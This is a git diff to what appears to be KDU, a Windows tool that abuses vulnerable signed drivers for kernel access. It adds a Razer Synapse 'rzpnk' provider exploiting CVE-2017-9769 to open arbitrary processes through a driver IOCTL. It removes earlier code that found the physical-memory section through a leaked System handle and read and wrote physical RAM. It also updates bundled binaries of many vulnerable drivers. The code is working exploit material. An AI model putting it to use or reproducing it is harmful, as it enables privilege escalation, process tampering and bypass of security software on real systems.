diff --git a/README.md b/README.md
index 5040cf0..74c127e 100644
--- a/README.md
+++ b/README.md
@@ -149,6 +149,7 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
| 40 | NVidia | nvoclock | NVidia System Utility Driver | Original | 7.0.0.32 | |
| 41 | Binalyze | IREC | Binalyze DFIR | Original | 3.11.0 | |
| 42 | DavidXXW | PhyDMACC | SLIC ToolKit | WINRING0 | 1.2.0 | |
+| 43 | Razer | rzpnk | Razer Synapse | Original | 2.20.15.1104 | |
###### *At commit time, data maybe inaccurate.
diff --git a/Source/Hamakaze/KDU.vcxproj b/Source/Hamakaze/KDU.vcxproj
index d38df57..ee1d08d 100644
--- a/Source/Hamakaze/KDU.vcxproj
+++ b/Source/Hamakaze/KDU.vcxproj
@@ -156,6 +156,7 @@
+
@@ -217,6 +218,7 @@
+
diff --git a/Source/Hamakaze/KDU.vcxproj.filters b/Source/Hamakaze/KDU.vcxproj.filters
index 2016d7c..9bfc8e3 100644
--- a/Source/Hamakaze/KDU.vcxproj.filters
+++ b/Source/Hamakaze/KDU.vcxproj.filters
@@ -216,6 +216,9 @@
Source Files\idrv
+
+ Source Files\idrv
+
@@ -404,6 +407,9 @@
Source Files\idrv
+
+ Source Files\idrv
+
diff --git a/Source/Hamakaze/KDU.vcxproj.user b/Source/Hamakaze/KDU.vcxproj.user
index 007b498..d1f34ae 100644
--- a/Source/Hamakaze/KDU.vcxproj.user
+++ b/Source/Hamakaze/KDU.vcxproj.user
@@ -1,8 +1,7 @@
-
-
+ -prv 43 -dmp 440
WindowsLocalDebugger
diff --git a/Source/Hamakaze/idrv/rzpnk.cpp b/Source/Hamakaze/idrv/rzpnk.cpp
index 418cdee..11e81bc 100644
--- a/Source/Hamakaze/idrv/rzpnk.cpp
+++ b/Source/Hamakaze/idrv/rzpnk.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: RZPNK.CPP
*
-* VERSION: 1.00
+* VERSION: 1.40
*
-* DATE: 02 Feb 2020
+* DATE: 20 Oct 2023
*
* Razer Overlay Support driver routines.
*
@@ -20,69 +20,10 @@
#include "global.h"
#include "idrv/rzpnk.h"
-/*{
-
-//
-// Unfortunately all what it can - read/write to first 4gb of phys RAM.
-// Exploitation of this driver in CVE-2017-14398 was a PURELY accidential.
-//
- KDU_MAX_NTBUILDNUMBER,
- IDR_RAZER,
- 0,
- (LPWSTR)L"CVE-2017-9769, CVE-2017-9770",
- (LPWSTR)L"Razer",
- (LPWSTR)L"47CD78C9-64C3-47C2-B80F-677B887CF095",
- (provReadKernelVM)KDUProviderStub,
- (provWriteKernelVM)KDUProviderStub,
- (provVirtualToPhysical)KDUProviderStub,
- (provReadControlRegister)KDUProviderStub,
- (provReadPhysicalMemory)RazerReadPhysicalMemory,
- (provWritePhysicalMemory)RazerWritePhysicalMemory,
- (provRegisterDriver)RazerRegisterDriver,
- (provUnregisterDriver)RazerUnregisterDriver
-}*/
-
//
-// Based on CVE-2017-9769, CVE-2017-9770.
+// Based on CVE-2017-9769.
//
-HANDLE g_PhysicalMemorySection = NULL;
-
-/*
-* RazerCallDriver
-*
-* Purpose:
-*
-* Call Razer Rzpnk driver.
-*
-*/
-BOOL RazerCallDriver(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG IoControlCode,
- _In_ PVOID InputBuffer,
- _In_ ULONG InputBufferLength,
- _In_opt_ PVOID OutputBuffer,
- _In_opt_ ULONG OutputBufferLength)
-{
- BOOL bResult = FALSE;
- IO_STATUS_BLOCK ioStatus;
-
- NTSTATUS ntStatus = NtDeviceIoControlFile(DeviceHandle,
- NULL,
- NULL,
- NULL,
- &ioStatus,
- IoControlCode,
- InputBuffer,
- InputBufferLength,
- OutputBuffer,
- OutputBufferLength);
-
- bResult = NT_SUCCESS(ntStatus);
- SetLastError(RtlNtStatusToDosError(ntStatus));
- return bResult;
-}
-
/*
* RazerOpenProcess
*
@@ -91,294 +32,28 @@ BOOL RazerCallDriver(
* Call ZwOpenProcess via razer driver request.
*
*/
-BOOL RazerOpenProcess(
+BOOL WINAPI RazerOpenProcess(
_In_ HANDLE DeviceHandle,
_In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
_Out_ PHANDLE ProcessHandle
)
{
BOOL bResult;
RAZER_OPEN_PROCESS request;
+ UNREFERENCED_PARAMETER(DesiredAccess);
+
request.ProcessId = ProcessId;
request.ProcessHandle = NULL;
- bResult = RazerCallDriver(DeviceHandle,
+ bResult = supCallDriver(DeviceHandle,
IOCTL_RZPNK_OPEN_PROCESS,
&request,
sizeof(request),
&request,
sizeof(request));
- if (bResult) {
- *ProcessHandle = request.ProcessHandle;
- }
-
- return bResult;
-}
-
-/*
-* RazerMapMemory
-*
-* Purpose:
-*
-* Map physical memory through \Device\PhysicalMemory.
-*
-*/
-PVOID RazerMapMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
- _In_ ULONG ViewSize)
-{
- BOOL bResult = FALSE;
- DWORD dwError = ERROR_SUCCESS;
- RAZER_MAP_SECTION_INFO request;
- HANDLE selfHandle;
-
- UNREFERENCED_PARAMETER(PhysicalAddress);
-
- CLIENT_ID clientID;
-
- clientID.UniqueProcess = UlongToHandle(GetCurrentProcessId());
- clientID.UniqueThread = NULL;
-
- OBJECT_ATTRIBUTES dummy;
- InitializeObjectAttributes(&dummy, NULL, 0, NULL, NULL);
-
- if (!NT_SUCCESS(NtOpenProcess(&selfHandle, PROCESS_ALL_ACCESS, &dummy, &clientID)))
- return NULL;
-
- RtlSecureZeroMemory(&request, sizeof(request));
- request.ViewCommitSize = ViewSize;
- request.ProcessHandle = selfHandle;
- request.ProcessId = clientID.UniqueProcess;
- request.SectionHandle = g_PhysicalMemorySection;
-
- bResult = RazerCallDriver(DeviceHandle,
- IOCTL_RZPNK_MAP_SECTION_USER_MODE,
- &request,
- sizeof(request),
- &request,
- sizeof(request));
-
- if (!bResult) {
- dwError = GetLastError();
- }
- else {
- dwError = RtlNtStatusToDosError(request.Status);
- }
-
- CloseHandle(selfHandle);
-
- SetLastError(dwError);
- return request.MappedBaseAddress;
-}
-
-/*
-* RazerReadWritePhysicalMemory
-*
-* Purpose:
-*
-* Read/Write virtual memory via Razer.
-*
-*/
-BOOL WINAPI RazerReadWritePhysicalMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR Address,
- _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
- _In_ ULONG NumberOfBytes,
- _In_ BOOLEAN DoWrite)
-{
- BOOL bResult = FALSE;
- DWORD dwError = ERROR_SUCCESS;
-
- ULONG ViewSize;
-
- if ((Address + NumberOfBytes) > MAXDWORD32)
- return FALSE;
-
- ViewSize = Address + NumberOfBytes;
-
- PVOID mappedSection = RazerMapMemory(DeviceHandle, Address, ViewSize);
- if (mappedSection) {
-
- if (DoWrite) {
- RtlCopyMemory(RtlOffsetToPointer(mappedSection, Address), Buffer, NumberOfBytes);
- }
- else {
- RtlCopyMemory(Buffer, RtlOffsetToPointer(mappedSection, Address), NumberOfBytes);
- }
-
- NtUnmapViewOfSection(NtCurrentProcess(), mappedSection);
-
- bResult = TRUE;
- }
-
- SetLastError(dwError);
- return bResult;
-}
-
-/*
-* RazerReadPhysicalMemory
-*
-* Purpose:
-*
-* Read from physical memory.
-*
-*/
-BOOL WINAPI RazerReadPhysicalMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
- _In_ PVOID Buffer,
- _In_ ULONG NumberOfBytes)
-{
- return RazerReadWritePhysicalMemory(DeviceHandle,
- PhysicalAddress,
- Buffer,
- NumberOfBytes,
- FALSE);
-}
-
-/*
-* RazerWritePhysicalMemory
-*
-* Purpose:
-*
-* Write to physical memory.
-*
-*/
-BOOL WINAPI RazerWritePhysicalMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
- _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
- _In_ ULONG NumberOfBytes)
-{
- return RazerReadWritePhysicalMemory(DeviceHandle,
- PhysicalAddress,
- Buffer,
- NumberOfBytes,
- TRUE);
-}
-
-/*
-* RazerRegisterDriver
-*
-* Purpose:
-*
-* Initialize Razer specific global variable (section handle value).
-* Must be called before accessing Kernel R/W primitives.
-*
-*/
-BOOL WINAPI RazerRegisterDriver(
- _In_ HANDLE DeviceHandle)
-{
- BOOL bResult = FALSE;
- ULONG SectionObjectType = (ULONG)-1;
- HANDLE processHandle = NULL;
- HANDLE sectionHandle = NULL;
- PSYSTEM_HANDLE_INFORMATION_EX handleArray = NULL;
- UNICODE_STRING ustr;
- OBJECT_ATTRIBUTES obja;
-
- do {
- //
- // Open System process.
- //
- if (!RazerOpenProcess(DeviceHandle, (HANDLE)SYSTEM_PID_MAGIC, &processHandle))
- break;
-
- //
- // Open dummy section handle.
- //
- RtlInitUnicodeString(&ustr, L"\\KnownDlls\\kernel32.dll");
- InitializeObjectAttributes(&obja, &ustr, OBJ_CASE_INSENSITIVE, NULL, NULL);
- if (!NT_SUCCESS(NtOpenSection(§ionHandle, SECTION_QUERY, &obja)))
- break;
-
- handleArray = (PSYSTEM_HANDLE_INFORMATION_EX)supGetSystemInfo(SystemExtendedHandleInformation);
- if (handleArray == NULL)
- break;
-
- ULONG i;
- DWORD currentProcessId = GetCurrentProcessId();
-
- //
- // Find dummy section handle and remember it object type index.
- //
- for (i = 0; i < handleArray->NumberOfHandles; i++) {
- if (handleArray->Handles[i].UniqueProcessId == currentProcessId &&
- handleArray->Handles[i].HandleValue == (ULONG_PTR)sectionHandle)
- {
- SectionObjectType = handleArray->Handles[i].ObjectTypeIndex;
- break;
- }
- }
-
- NtClose(sectionHandle);
- sectionHandle = NULL;
-
- if (SectionObjectType == (ULONG)-1)
- break;
-
- HANDLE testHandle = NULL;
-
- //
- // Some heur to find \Device\PhysicalMemory section.
- //
- for (i = 0; i < handleArray->NumberOfHandles; i++) {
- if (handleArray->Handles[i].UniqueProcessId == SYSTEM_PID_MAGIC &&
- handleArray->Handles[i].ObjectTypeIndex == (ULONG_PTR)SectionObjectType &&
- handleArray->Handles[i].GrantedAccess == SECTION_ALL_ACCESS)
- {
- testHandle = (HANDLE)(SYSTEM_USER_TO_KERNEL_HANDLE + handleArray->Handles[i].HandleValue);
- g_PhysicalMemorySection = testHandle;
-
- PVOID testBuffer = RazerMapMemory(DeviceHandle, 0, 0x100000); //1mb
- if (testBuffer) {
-
- ULONG_PTR PML4 = supGetPML4FromLowStub1M((ULONG_PTR)testBuffer);
-
- NtUnmapViewOfSection(NtCurrentProcess(), testBuffer);
-
- //
- // PML4 found, section looks legit.
- //
- if (PML4)
- break;
- }
- g_PhysicalMemorySection = NULL;
- }
- }
-
- //
- // Remember section handle if found and valid.
- //
- if (testHandle) {
- g_PhysicalMemorySection = testHandle;
- bResult = TRUE;
- }
-
- } while (FALSE);
-
- if (sectionHandle) NtClose(sectionHandle);
- if (processHandle) NtClose(processHandle);
- if (handleArray) supHeapFree(handleArray);
-
+ *ProcessHandle = request.ProcessHandle;
return bResult;
}
-
-/*
-* RazerUnregisterDriver
-*
-* Purpose:
-*
-* Free razer driver related resources.
-*
-*/
-BOOL WINAPI RazerUnregisterDriver(
- _In_ HANDLE DeviceHandle)
-{
- UNREFERENCED_PARAMETER(DeviceHandle);
-
- return TRUE;
-}
diff --git a/Source/Hamakaze/idrv/rzpnk.h b/Source/Hamakaze/idrv/rzpnk.h
index 3c5db59..177ed9e 100644
--- a/Source/Hamakaze/idrv/rzpnk.h
+++ b/Source/Hamakaze/idrv/rzpnk.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: RZPNK.H
*
-* VERSION: 1.00
+* VERSION: 1.40
*
-* DATE: 02 Feb 2020
+* DATE: 20 Oct 2023
*
* Razer Overlay Support driver interface header.
*
@@ -20,51 +20,23 @@
#pragma once
//
-// Razer Overlay Support driver interface for CVE-2017-9769, CVE-2017-9770.
+// Razer Overlay Support driver interface for CVE-2017-9769.
//
-#define RAZER_DEVICE_TYPE 0x00000022 //DEVICE_TYPE_UNKNOWN
+#define RAZER_DEVICE_TYPE FILE_DEVICE_UNKNOWN
#define RAZER_OPEN_PROCESS_FUNCID (DWORD)0x814
-#define RAZER_MAP_SECTION_FUNCID (DWORD)0x819
-#define IOCTL_RZPNK_OPEN_PROCESS CTL_CODE(RAZER_DEVICE_TYPE, RAZER_OPEN_PROCESS_FUNCID, METHOD_BUFFERED, FILE_WRITE_ACCESS) //0x22A050
-#define IOCTL_RZPNK_MAP_SECTION_USER_MODE CTL_CODE(RAZER_DEVICE_TYPE, RAZER_MAP_SECTION_FUNCID, METHOD_BUFFERED, FILE_WRITE_ACCESS) //0x22A064
-
-#define SYSTEM_PID_MAGIC 4
-#define SYSTEM_USER_TO_KERNEL_HANDLE 0xffffffff80000000
+#define IOCTL_RZPNK_OPEN_PROCESS \
+ CTL_CODE(RAZER_DEVICE_TYPE, RAZER_OPEN_PROCESS_FUNCID, METHOD_BUFFERED, FILE_WRITE_ACCESS) //0x22A050
typedef struct _RAZER_OPEN_PROCESS {
HANDLE ProcessId;
HANDLE ProcessHandle;
} RAZER_OPEN_PROCESS, * PRAZER_OPEN_PROCESS;
-#pragma warning(push)
-#pragma warning(disable:4324) // structure padded due to __declspec(align())
-typedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT)_RAZER_MAP_SECTION_INFO {
- HANDLE ProcessHandle;
- HANDLE ProcessId;
- HANDLE SectionHandle;
- PVOID MappedBaseAddress;
- ULONG ViewCommitSize; //WARNING, cannot map above 4GB
- NTSTATUS Status;
-} RAZER_MAP_SECTION_INFO, * PRAZER_MAP_SECTION_INFO;
-#pragma warning(pop)
-
-BOOL WINAPI RazerRegisterDriver(
- _In_ HANDLE DeviceHandle);
-
-BOOL WINAPI RazerUnregisterDriver(
- _In_ HANDLE DeviceHandle);
-
-BOOL WINAPI RazerReadPhysicalMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
- _In_ PVOID Buffer,
- _In_ ULONG NumberOfBytes);
-
-BOOL WINAPI RazerWritePhysicalMemory(
+BOOL WINAPI RazerOpenProcess(
_In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
- _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
- _In_ ULONG NumberOfBytes);
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/kduplist.h b/Source/Hamakaze/kduplist.h
index ce8de44..3f4ef19 100644
--- a/Source/Hamakaze/kduplist.h
+++ b/Source/Hamakaze/kduplist.h
@@ -46,6 +46,7 @@
#include "idrv/echodrv.h"
#include "idrv/nvidia.h"
#include "idrv/binalyze.h"
+#include "idrv/rzpnk.h"
//
// Victims public array.
@@ -1204,6 +1205,33 @@ static KDU_PROVIDER g_KDUProviders[] =
(provValidatePrerequisites)NULL,
(provOpenProcess)NULL
+ },
+
+
+ {
+ NULL,
+
+ (provStartVulnerableDriver)KDUProvStartVulnerableDriver,
+ (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+ (provRegisterDriver)NULL,
+ (provUnregisterDriver)NULL,
+ (provPreOpenDriver)NULL,
+ (provPostOpenDriver)NULL,
+ (provMapDriver)NULL,
+ (provControlDSE)NULL,
+
+ (provReadKernelVM)NULL,
+ (provWriteKernelVM)NULL,
+
+ (provVirtualToPhysical)NULL,
+ (provQueryPML4)NULL,
+ (provReadPhysicalMemory)NULL,
+ (provWritePhysicalMemory)NULL,
+
+ (provValidatePrerequisites)NULL,
+
+ (provOpenProcess)RazerOpenProcess
}
};
diff --git a/Source/Hamakaze/res/SB_SMBUS_SDK.bin b/Source/Hamakaze/res/SB_SMBUS_SDK.bin
index ad9a62e..fb862f3 100644
Binary files a/Source/Hamakaze/res/SB_SMBUS_SDK.bin and b/Source/Hamakaze/res/SB_SMBUS_SDK.bin differ
diff --git a/Source/Hamakaze/res/Taigei32.bin b/Source/Hamakaze/res/Taigei32.bin
index c1530dc..02c005f 100644
Binary files a/Source/Hamakaze/res/Taigei32.bin and b/Source/Hamakaze/res/Taigei32.bin differ
diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h
index 9193c20..76e8114 100644
--- a/Source/Shared/consts.h
+++ b/Source/Shared/consts.h
@@ -104,6 +104,7 @@
#define IDR_PROCEXP1627 2000
#define IDR_PROCEXP1702 2001
#define IDR_INTEL_NAL 103
+#define IDR_RZPNK 104
#define IDR_RTCORE64 105
#define IDR_GDRV 106
#define IDR_ATSZIO64 107
@@ -192,6 +193,7 @@
#define KDU_PROVIDER_NVOCLOCK 40
#define KDU_PROVIDER_BINALYZE_IREC 41
#define KDU_PROVIDER_PHYDMACC 42
+#define KDU_PROVIDER_RAZER 43
#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL
diff --git a/Source/Tanikaze/Tanikaze.vcxproj b/Source/Tanikaze/Tanikaze.vcxproj
index abf02fd..070a6d1 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj
+++ b/Source/Tanikaze/Tanikaze.vcxproj
@@ -219,6 +219,7 @@
+
@@ -226,6 +227,7 @@
+
diff --git a/Source/Tanikaze/Tanikaze.vcxproj.filters b/Source/Tanikaze/Tanikaze.vcxproj.filters
index b6dbb69..37d150d 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj.filters
+++ b/Source/Tanikaze/Tanikaze.vcxproj.filters
@@ -184,6 +184,12 @@
Resource Files
+
+ Resource Files
+
+
+ Resource Files
+
diff --git a/Source/Tanikaze/data/AsusCertService.bin b/Source/Tanikaze/data/AsusCertService.bin
index cebad5f..bf3b089 100644
Binary files a/Source/Tanikaze/data/AsusCertService.bin and b/Source/Tanikaze/data/AsusCertService.bin differ
diff --git a/Source/Tanikaze/data/KMUEXE.bin b/Source/Tanikaze/data/KMUEXE.bin
index febc0ed..ae8f343 100644
Binary files a/Source/Tanikaze/data/KMUEXE.bin and b/Source/Tanikaze/data/KMUEXE.bin differ
diff --git a/Source/Tanikaze/data/KMUSIG.bin b/Source/Tanikaze/data/KMUSIG.bin
index 36a33bc..4f5a599 100644
--- a/Source/Tanikaze/data/KMUSIG.bin
+++ b/Source/Tanikaze/data/KMUSIG.bin
@@ -1,2 +1,2 @@
-���7?a�ce���z���,]�qq�>Vf[��&S�>��o��ְ��kFzQ���y,�-ҷ}e�I8��q^g���0��^������r�*�(��a�7p}�?�4FjB\0K$1g^퉄����b����V`ʹ���%뇱�7�*���֯�>��wi���
+���7�-Vf[��&S�>��o��ְ��kFzQ���y,�-ҷ}e�I8��q^g���0��^������r�*�(��a�7p}�?�4FjB\0K$1g^퉄����b����V`ʹ���%뇱�7�*���֯�>��wi���
m�V?�SH��/�0���8��H�
]��
\ No newline at end of file
diff --git a/Source/Tanikaze/data/dbutilcat.bin b/Source/Tanikaze/data/dbutilcat.bin
index e70711b..a77585d 100644
Binary files a/Source/Tanikaze/data/dbutilcat.bin and b/Source/Tanikaze/data/dbutilcat.bin differ
diff --git a/Source/Tanikaze/data/dbutilinf.bin b/Source/Tanikaze/data/dbutilinf.bin
index c7613c6..bf8e745 100644
Binary files a/Source/Tanikaze/data/dbutilinf.bin and b/Source/Tanikaze/data/dbutilinf.bin differ
diff --git a/Source/Tanikaze/drv/ALSysIO64.bin b/Source/Tanikaze/drv/ALSysIO64.bin
index bafa186..417f423 100644
Binary files a/Source/Tanikaze/drv/ALSysIO64.bin and b/Source/Tanikaze/drv/ALSysIO64.bin differ
diff --git a/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin b/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin
index 278c459..f6d4c82 100644
Binary files a/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin and b/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin differ
diff --git a/Source/Tanikaze/drv/ATSZIO64.bin b/Source/Tanikaze/drv/ATSZIO64.bin
index b11f764..d72e2e9 100644
Binary files a/Source/Tanikaze/drv/ATSZIO64.bin and b/Source/Tanikaze/drv/ATSZIO64.bin differ
diff --git a/Source/Tanikaze/drv/AsIO3.bin b/Source/Tanikaze/drv/AsIO3.bin
index f4b0cdf..55979ab 100644
Binary files a/Source/Tanikaze/drv/AsIO3.bin and b/Source/Tanikaze/drv/AsIO3.bin differ
diff --git a/Source/Tanikaze/drv/AsrDrv106.bin b/Source/Tanikaze/drv/AsrDrv106.bin
index 0a2c85e..d8e1e48 100644
Binary files a/Source/Tanikaze/drv/AsrDrv106.bin and b/Source/Tanikaze/drv/AsrDrv106.bin differ
diff --git a/Source/Tanikaze/drv/DbUtil2_3.bin b/Source/Tanikaze/drv/DbUtil2_3.bin
index 1090598..9a3e8b1 100644
Binary files a/Source/Tanikaze/drv/DbUtil2_3.bin and b/Source/Tanikaze/drv/DbUtil2_3.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64.bin b/Source/Tanikaze/drv/DirectIo64.bin
index ea709e5..bfa61d7 100644
Binary files a/Source/Tanikaze/drv/DirectIo64.bin and b/Source/Tanikaze/drv/DirectIo64.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64_2.bin b/Source/Tanikaze/drv/DirectIo64_2.bin
index e305fee..b101ea3 100644
Binary files a/Source/Tanikaze/drv/DirectIo64_2.bin and b/Source/Tanikaze/drv/DirectIo64_2.bin differ
diff --git a/Source/Tanikaze/drv/EneIo64.bin b/Source/Tanikaze/drv/EneIo64.bin
index 2c1a76e..b816db1 100644
Binary files a/Source/Tanikaze/drv/EneIo64.bin and b/Source/Tanikaze/drv/EneIo64.bin differ
diff --git a/Source/Tanikaze/drv/EneTechIo64.bin b/Source/Tanikaze/drv/EneTechIo64.bin
index e004245..6abbfa7 100644
Binary files a/Source/Tanikaze/drv/EneTechIo64.bin and b/Source/Tanikaze/drv/EneTechIo64.bin differ
diff --git a/Source/Tanikaze/drv/GLCKIO2.bin b/Source/Tanikaze/drv/GLCKIO2.bin
index 5f40419..e2605fb 100644
Binary files a/Source/Tanikaze/drv/GLCKIO2.bin and b/Source/Tanikaze/drv/GLCKIO2.bin differ
diff --git a/Source/Tanikaze/drv/HW64.bin b/Source/Tanikaze/drv/HW64.bin
index 1070c62..2ef2c37 100644
Binary files a/Source/Tanikaze/drv/HW64.bin and b/Source/Tanikaze/drv/HW64.bin differ
diff --git a/Source/Tanikaze/drv/KExplore.bin b/Source/Tanikaze/drv/KExplore.bin
index 0ba3679..2c28ad6 100644
Binary files a/Source/Tanikaze/drv/KExplore.bin and b/Source/Tanikaze/drv/KExplore.bin differ
diff --git a/Source/Tanikaze/drv/KObjExp.bin b/Source/Tanikaze/drv/KObjExp.bin
index ef2637d..34c0979 100644
Binary files a/Source/Tanikaze/drv/KObjExp.bin and b/Source/Tanikaze/drv/KObjExp.bin differ
diff --git a/Source/Tanikaze/drv/KRegExp.bin b/Source/Tanikaze/drv/KRegExp.bin
index e33c42f..edf5c4c 100644
Binary files a/Source/Tanikaze/drv/KRegExp.bin and b/Source/Tanikaze/drv/KRegExp.bin differ
diff --git a/Source/Tanikaze/drv/LDD.bin b/Source/Tanikaze/drv/LDD.bin
index 327a189..66b3f3c 100644
Binary files a/Source/Tanikaze/drv/LDD.bin and b/Source/Tanikaze/drv/LDD.bin differ
diff --git a/Source/Tanikaze/drv/MsIo64.bin b/Source/Tanikaze/drv/MsIo64.bin
index cea6e12..c2093ae 100644
Binary files a/Source/Tanikaze/drv/MsIo64.bin and b/Source/Tanikaze/drv/MsIo64.bin differ
diff --git a/Source/Tanikaze/drv/PhyDMACC.bin b/Source/Tanikaze/drv/PhyDMACC.bin
index 49804b6..cb58ce6 100644
Binary files a/Source/Tanikaze/drv/PhyDMACC.bin and b/Source/Tanikaze/drv/PhyDMACC.bin differ
diff --git a/Source/Tanikaze/drv/Phymemx64.bin b/Source/Tanikaze/drv/Phymemx64.bin
index 301b55d..ea4e5d9 100644
Binary files a/Source/Tanikaze/drv/Phymemx64.bin and b/Source/Tanikaze/drv/Phymemx64.bin differ
diff --git a/Source/Tanikaze/drv/RTCore64.bin b/Source/Tanikaze/drv/RTCore64.bin
index cfd2928..5230d68 100644
Binary files a/Source/Tanikaze/drv/RTCore64.bin and b/Source/Tanikaze/drv/RTCore64.bin differ
diff --git a/Source/Tanikaze/drv/SysDrv3S.bin b/Source/Tanikaze/drv/SysDrv3S.bin
index e60d920..54814f4 100644
Binary files a/Source/Tanikaze/drv/SysDrv3S.bin and b/Source/Tanikaze/drv/SysDrv3S.bin differ
diff --git a/Source/Tanikaze/drv/WinRing0x64.bin b/Source/Tanikaze/drv/WinRing0x64.bin
index 3191bc2..978ddf5 100644
Binary files a/Source/Tanikaze/drv/WinRing0x64.bin and b/Source/Tanikaze/drv/WinRing0x64.bin differ
diff --git a/Source/Tanikaze/drv/amsdk.bin b/Source/Tanikaze/drv/amsdk.bin
index 2715dd8..a9d7d0e 100644
Binary files a/Source/Tanikaze/drv/amsdk.bin and b/Source/Tanikaze/drv/amsdk.bin differ
diff --git a/Source/Tanikaze/drv/asio2.bin b/Source/Tanikaze/drv/asio2.bin
index 198ff56..a13ca24 100644
Binary files a/Source/Tanikaze/drv/asio2.bin and b/Source/Tanikaze/drv/asio2.bin differ
diff --git a/Source/Tanikaze/drv/dbk64.bin b/Source/Tanikaze/drv/dbk64.bin
index 80428bb..635d538 100644
Binary files a/Source/Tanikaze/drv/dbk64.bin and b/Source/Tanikaze/drv/dbk64.bin differ
diff --git a/Source/Tanikaze/drv/dbutildrv2.bin b/Source/Tanikaze/drv/dbutildrv2.bin
index 1bddbe3..4cd2723 100644
Binary files a/Source/Tanikaze/drv/dbutildrv2.bin and b/Source/Tanikaze/drv/dbutildrv2.bin differ
diff --git a/Source/Tanikaze/drv/echo_driver.bin b/Source/Tanikaze/drv/echo_driver.bin
index a2ef048..2177f3a 100644
Binary files a/Source/Tanikaze/drv/echo_driver.bin and b/Source/Tanikaze/drv/echo_driver.bin differ
diff --git a/Source/Tanikaze/drv/ene2.bin b/Source/Tanikaze/drv/ene2.bin
index 9fc6289..869c83e 100644
Binary files a/Source/Tanikaze/drv/ene2.bin and b/Source/Tanikaze/drv/ene2.bin differ
diff --git a/Source/Tanikaze/drv/etdsupp.bin b/Source/Tanikaze/drv/etdsupp.bin
index aaa2cd4..5a998fc 100644
Binary files a/Source/Tanikaze/drv/etdsupp.bin and b/Source/Tanikaze/drv/etdsupp.bin differ
diff --git a/Source/Tanikaze/drv/gdrv.bin b/Source/Tanikaze/drv/gdrv.bin
index 09c2b13..ee17a80 100644
Binary files a/Source/Tanikaze/drv/gdrv.bin and b/Source/Tanikaze/drv/gdrv.bin differ
diff --git a/Source/Tanikaze/drv/gmerdrv.bin b/Source/Tanikaze/drv/gmerdrv.bin
index ade1456..3d29c72 100644
Binary files a/Source/Tanikaze/drv/gmerdrv.bin and b/Source/Tanikaze/drv/gmerdrv.bin differ
diff --git a/Source/Tanikaze/drv/heavenluo.bin b/Source/Tanikaze/drv/heavenluo.bin
index f150b50..1549cac 100644
Binary files a/Source/Tanikaze/drv/heavenluo.bin and b/Source/Tanikaze/drv/heavenluo.bin differ
diff --git a/Source/Tanikaze/drv/iQVM64.bin b/Source/Tanikaze/drv/iQVM64.bin
index a95a7b2..ecd7740 100644
Binary files a/Source/Tanikaze/drv/iQVM64.bin and b/Source/Tanikaze/drv/iQVM64.bin differ
diff --git a/Source/Tanikaze/drv/inpoutx64.bin b/Source/Tanikaze/drv/inpoutx64.bin
index 7b92628..046e157 100644
Binary files a/Source/Tanikaze/drv/inpoutx64.bin and b/Source/Tanikaze/drv/inpoutx64.bin differ
diff --git a/Source/Tanikaze/drv/irec.bin b/Source/Tanikaze/drv/irec.bin
index af0e5b6..855b7da 100644
Binary files a/Source/Tanikaze/drv/irec.bin and b/Source/Tanikaze/drv/irec.bin differ
diff --git a/Source/Tanikaze/drv/kprocesshacker.bin b/Source/Tanikaze/drv/kprocesshacker.bin
index 107b363..662ca8e 100644
Binary files a/Source/Tanikaze/drv/kprocesshacker.bin and b/Source/Tanikaze/drv/kprocesshacker.bin differ
diff --git a/Source/Tanikaze/drv/lha.bin b/Source/Tanikaze/drv/lha.bin
index 9637255..d23c417 100644
Binary files a/Source/Tanikaze/drv/lha.bin and b/Source/Tanikaze/drv/lha.bin differ
diff --git a/Source/Tanikaze/drv/mimidrv.bin b/Source/Tanikaze/drv/mimidrv.bin
index c88db1b..d2308f3 100644
Binary files a/Source/Tanikaze/drv/mimidrv.bin and b/Source/Tanikaze/drv/mimidrv.bin differ
diff --git a/Source/Tanikaze/drv/nvoclock.bin b/Source/Tanikaze/drv/nvoclock.bin
index 832ba6e..bc7076f 100644
Binary files a/Source/Tanikaze/drv/nvoclock.bin and b/Source/Tanikaze/drv/nvoclock.bin differ
diff --git a/Source/Tanikaze/drv/pcdsrvc_x64.bin b/Source/Tanikaze/drv/pcdsrvc_x64.bin
index 6a0be9c..b7e78b4 100644
Binary files a/Source/Tanikaze/drv/pcdsrvc_x64.bin and b/Source/Tanikaze/drv/pcdsrvc_x64.bin differ
diff --git a/Source/Tanikaze/drv/physmem.bin b/Source/Tanikaze/drv/physmem.bin
index 8e58db2..330fae9 100644
Binary files a/Source/Tanikaze/drv/physmem.bin and b/Source/Tanikaze/drv/physmem.bin differ
